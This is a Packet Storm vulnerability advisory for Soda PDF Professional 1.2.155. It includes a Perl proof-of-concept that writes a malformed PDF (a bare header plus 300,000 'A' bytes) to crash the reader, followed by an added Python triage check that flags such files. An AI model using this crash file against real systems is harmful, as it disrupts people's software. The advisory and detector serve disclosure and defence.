Soda PDF Professional 1.2.155 Denial Of Service

2011-11-10T00:00:00
ID PACKETSTORM:106828
Type packetstorm
Reporter LiquidWorm
Modified 2011-11-10T00:00:00

Description

`#!/usr/bin/perl  
#  
#  
# Soda PDF Professional 1.2.155 PDF/WWF File Handling Restriction of Service (RoS)  
#  
#  
# Vendor: LULU software  
# Product web page: http://www.sodapdf.com  
# Affected version: 1.2.155.1729 (Professional with OCR)  
#  
# Summary: Increase your efficiency with Soda PDF Professional, the smart  
# & simple tool for opening, creating, editing, converting, and securing  
# PDF files in a collaborative environment. Save time by using powerful  
# automated features like batch PDF creation, professional templates &  
# document comparison.  
#  
# Desc: Soda PDF Pro suffers from a restriction of service (RoS) vulnerability  
# when handling PDF or WWF file formats which can be exploited by malicious  
# people to cause a denial of service scenario.  
#  
#  
# Tested on: Microsoft Windows XP Professional SP3 (EN)  
#  
#  
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
# liquidworm gmail com  
#  
#  
# Advisory ID: ZSL-2011-5056  
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5056.php  
#  
#  
# 10.11.2011  
#  
  
  
use strict;  
  
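my $file = "Midnight_in_Paris.pdf"; # or .wwf  
# File content: the bytes "%PDF\n" followed by 300000 "A" (0x41) bytes  
my $tovar = "\x25\x50\x44\x46\x0A"."\x41" x 300000;  
print "\n\n[*] Creating $file file...\n";  
# "or" instead of "||": with "||" the die was bound to the filename string and never ran  
open(ZSL, ">", "./$file") or die "\nCan't open $file: $!";  
print ZSL $tovar;  
print "\n[.] File successfully mounted!\n\n";  
close ZSL;  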
`
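
A pre-parse triage check that a mail or upload gateway could run before a file reaches a desktop PDF reader, given here as an added example that is not part of the original advisory. It flags files that claim to be PDF but lack the structure a PDF parser expects, which is the layout of the file the script above writes. The function name, finding labels, thresholds and sample bytes are assumptions made for the example.

```python
import re

# Markers a well-formed PDF carries: a versioned header, indirect objects,
# a startxref pointer and an %%EOF marker near the end of the file.
HEADER = re.compile(rb"%PDF-\d\.\d")
INDIRECT_OBJ = re.compile(rb"\d+\s+\d+\s+obj\b")


def triage_pdf(data: bytes, max_run: int = 4096) -> list[str]:
    """Return structural findings for a file claiming to be PDF ([] = none)."""
    if not data.startswith(b"%PDF"):
        return ["not-pdf"]
    findings = []
    if not HEADER.match(data):
        findings.append("header-without-version")
    if not INDIRECT_OBJ.search(data):
        findings.append("no-indirect-objects")
    tail = data[-2048:]
    if b"startxref" not in tail:
        findings.append("no-startxref")
    if b"%%EOF" not in tail:
        findings.append("no-eof-marker")
    # Heuristic: one byte value repeated more than max_run times in a row.
    # Uncompressed streams can trip this, so treat it as a supporting signal.
    if re.search(rb"(.)\1{%d}" % max_run, data, re.S):
        findings.append("long-single-byte-run")
    return findings


# Constructed samples: a minimal well-formed skeleton, and a file with the same
# layout as the advisory's output (bare "%PDF\n" header, then one repeated byte).
WELL_FORMED = (b"%PDF-1.4\n1 0 obj\n<< /Type /Catalog >>\nendobj\n"
               b"xref\n0 2\ntrailer\n<< /Root 1 0 R >>\nstartxref\n45\n%%EOF\n")
MALFORMED = b"%PDF\n" + b"A" * 300000

if __name__ == "__main__":
    for name, blob in (("well-formed", WELL_FORMED), ("malformed", MALFORMED)):
        print(name, triage_pdf(blob) or "ok")
```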